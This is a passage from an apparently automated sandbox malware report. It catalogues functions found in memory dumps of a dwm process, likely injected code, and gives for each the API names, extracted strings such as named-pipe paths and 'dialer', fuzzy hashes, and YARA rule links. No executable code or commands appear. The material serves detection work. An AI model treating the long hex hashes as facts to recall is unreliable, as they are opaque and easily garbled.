                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 8c61c6d8054685d327fffbec9d36e1ce135c5da1a75d05695b230c3bc2c86dbb
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: C081A03CE0B74186FA50EB65A47D3996691BF85F80F58C4359D0887796EF38CB678700
                                                                      Function 00000283E0F49DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 418e34784d5a447dd3c256712573709a6202cb3104d8d5a6fc7c68b9148e4065
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: 5D31D73931FA40E1EE71DB46A4287652394BF48FA0F598535DD2D0B794EF39C6678320
                                                                      Function 00000283E0F53DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction ID: 7a51c0677d45ef2d8e0f8e865b40ec92b9e3b9c247ce94acbb139c0e2b78fc90
                                                                      • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                      • Instruction Fuzzy Hash: B6118635711F4586EB50CB96F86831977A0FB88FE4F048234EE6A87795CF38CA258740
                                                                      Function 00000283E0F42F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 536a268e0e5e3639d0888a8f7f97f469e3674698813aefb5f4136be3c4b9bd04
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 7A31D03A306B5182EB90CF56E56872967A0FF54F94F48C1309E4847B55EF34C6B6C300
                                                                      Function 00000283E0F4CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 154892d3e38e2f68da5f5246155fcb5eb63c7e71888735a220365c86bd7dd9c7
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: DE115C3820B24441FA64E725657D32D22427F84FB4F14C734AC76476DADE388A679340
                                                                      Function 00000283E0F4199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 23decca88725c2b3b00bf0f5d8d34652aec515441ee14e667521a1a3eeed6bab
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: F9018C39306A4182FB50DB92A86C35963A1FB88FC4F888035DE5943755DF3CCA9AC700
                                                                      Function 00000283E0F436C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: a67bfcefeba7eb895c7c608116b79544e41d4809c8cb3b63860f3eb6848e847b
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 02010579216B4582FF64DB62E82C31A63A0BF59F96F048434CD59077A5EF3DC62A8700
                                                                      Function 00000283E0F48FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction ID: 321a2b3b388ed8ae64d17865d950159ced89eee023d1c0ba046b44844daa2799
                                                                      • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                      • Instruction Fuzzy Hash: 5551AF3A70E6028AEB24CB25E85CB593796FB84F88F14C534DE1647788EF35CA62C700
                                                                      Function 00000283E0F41A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FinalHandleNamePathlstrlen
                                                                      • String ID: \\?\
                                                                      • API String ID: 2719912262-4282027825
                                                                      • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction ID: d868a94041ba18b6d278cb3cf090a9628417af63207eabbc4d7a0bf3499e9ed8
                                                                      • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                      • Instruction Fuzzy Hash: AEF03C3630564192EB60CBA1E8A875A6761FB48FC8F848130DE4947A54DF3CCB9FCB00
                                                                      Function 00000283E0F4BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: d6dac142fbb9f8630eee622a60a017c95142a55b6061ba0e5eb4aae9131604b1
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 6AF06269216B0581EF10CB64E4AC3596320FF89F61F548239DE6A462E4DF3CCA66C340
                                                                      Function 00000283E0F43044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 6aa765165a6bfee8af7352b26e05aa917e85148d459e8a900a09ba222e6ed986
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 7DF08C2830AB8182FE54CB97B92C1196660BF48FD4F08C130EE5A07B18DF3CCAA78700
                                                                      Function 00000283E0F45710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                      • Instruction ID: a67e98a6c6bbaff2d99db1ed57da5f7441afd0c011e62184b7e4e68d30db664a
                                                                      • Opcode Fuzzy Hash: 4678552974c2dc3df73a17a4dcf6fd2c3d7689486890f7c1069e8590a64c51b2
                                                                      • Instruction Fuzzy Hash: 9E61E93A51EB48C6E760DB55E46831A77A0F788F85F108225EE8D47BA9DF7CC661CB00
                                                                      Function 00000283E0F54104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 6f1f41e61fdfb75a22bfa71e0b8f61bac35eb3f29a569d0c45ebd88b0539823f
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 8611012AA42E5011FE2691E8D43D3650010FF68BFCF09C634AD3607AE68E34EEE34300
                                                                      Function 00000283E0F23504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: 3860899c575d735ffc7640441c4a4e9dca2ee44a3cfd435af13dbf794bcd07e5
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: 9211A3AEA52A1311FA649528E47F36911C07F58B74F4CC639AD6E162D6CF38CBA34301
                                                                      Function 00000283E0F1F040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                      • API String ID: 3215553584-4202648911
                                                                      • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction ID: cab4f1c358a123e86adfbdb896796ed04178d4609f07ce5fe4d3a3cab3bcc8d1
                                                                      • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                      • Instruction Fuzzy Hash: 0161A27E60224092F669CB64E57C32926A1BF45F50F54C435CE0A337A7DE38CB6B8700
                                                                      Function 00000283E0F4AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 0ce9e477f8b28b00187c4e16db248bddc410558e9b5d9ea10c1edadac973804b
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: AD61703760AB54CAEB20DF65D49439D77A1FB44B88F048225EF4917B98DF38C666C700
                                                                      Function 00000283E0F4AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: fc89320dff4a40da580da1a3e5149ef6dae78b235dcb618a42e7cf795ac02eb3
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 1751AF7A1092908AEB74CF2694A835977A0FF54F94F18C125EE9947BD5CF38C6B2C700
                                                                      Function 00000283E0F1A178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 4f2f5e27246206eea56d69c412b8d0279ed71c7f2e8b6425a9b5b4536880f7d5
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 9A517F3A105280CAEB64CB26D56835877A0FF55F94F18C225DE9987BD6CF39D672CB00
                                                                      Function 00000283E0F18405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 5efba598371f3164d5c269a6dd6e3b14d3005976408686a2b30e5cf693d1dc77
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 0F51BF3A7036008AEB14CB15E668B1937A6FB54FA8F58C174DE064378AEF35CA63C704
                                                                      Function 00000283E0F183E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 9f5793f7d0de699efc5533be273cbdb4f095eb45e2e66b69fd8bd05b7d6f41b1
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: CB31AB3A202640C6E714DF12E968B1937A5FB44FE8F59C064EE5A0378ADF39CA63C704
                                                                      Function 00000283E0F52058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: ef1fbaafced2506ef859b809f846c958e5abc1253f6c18c8ab5c15a880b2df03
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: DCD10436706A8089EB51CFF9D45439C3BB1FB65B98F108225CE5997B9ADE34CA27C340
                                                                      Function 00000283E0F414A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: bca7a7537413a814024c18e74fad7fd988dc4860cfb6eff8150520532d3ea991
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: E101803A502F91C6DB04DFA2E81815A63A0FB49F81F058035DF5943725DF34C562C740
                                                                      Function 00000283E0F52980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: dc989ce590924e645d5388a2195a7d2d74917cf09d83041b89717d64de52fe04
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: E991093670265095FFA0DFE594683AD3BA0BB66F88F148229DE0A57685DF34CE63C700
                                                                      Function 00000283E0F47960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: dea16539f3025a33b20a8d24ec1f8733f5a989418c8bfd37371a2de8c3ac8ab8
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: 45113326711F0589EF40CFA0E8693A833A4F719B58F440D31DE6D47794DF78C6A58380
                                                                      Function 00000283E0F4253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: bd14db6195d5791528c6a8e5356023968551f1e599348ad060c522a7f8a2eed5
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: 6471063A20978145E7B4DF25E8683AE6790FBA5F84F858136DE0953B89DE34C752C700
                                                                      Function 00000283E0F19E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588789801.00000283E0F10000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000283E0F10000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f10000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction ID: 51b4e0f25df2e595eab0c30582cae3810a8148ec4eb02d9f0615e9b7bf5494d6
                                                                      • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                      • Instruction Fuzzy Hash: 06618F3B606B448AEB20DF65D45439D7BA0FB48F88F048225EF4917B9ADF38D266C740
                                                                      Function 00000283E0F42330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 19fc3e2ca2e19138768e866d6378d2217a07a0f3910f03fc46d9ba3512f0dfde
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 4051273A60E38181E6B4DE29A07C3BE6751FBA5F80F858135DE4903B5ACE39C766C740
                                                                      Function 00000283E0F526F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000029.00000002.2588822649.00000283E0F40000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000283E0F40000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_41_2_283e0f40000_dwm.jbxd
